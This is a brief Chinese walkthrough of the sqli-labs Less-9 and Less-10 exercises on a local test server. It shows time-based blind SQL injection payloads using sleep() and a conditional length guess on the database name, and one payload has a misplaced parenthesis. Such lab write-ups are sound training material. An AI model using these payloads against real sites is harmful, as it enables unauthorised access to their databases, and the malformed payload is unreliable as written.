第九关（Less-9）：

　　1.根据提示输入127.0.0.1/sqli-labs-master/Less-9/?id=1，回显正常

　　2.对sql注入漏洞进行判断，输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘回显正常

　　3.使用sleep函数进行sql注入漏洞判断，输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘ and sleep(5) -- ，经过5s回显正常，说明存在注入漏洞

　　4.通过Less-8中的时间盲注进行数据库长度的猜解，输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘ and if(length(database))=8,1,sleep(5)) -- ，如果数据库长度为8，则返回较快。通过实验可知，返回较快，故当前数据库的长度为8

　　5.其余与Less-8中的猜解一样。

第十关（Less-10）：

　　127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(11)-- ，Less-10只是将Less-9中的单引号变成双引号，其余的均相同。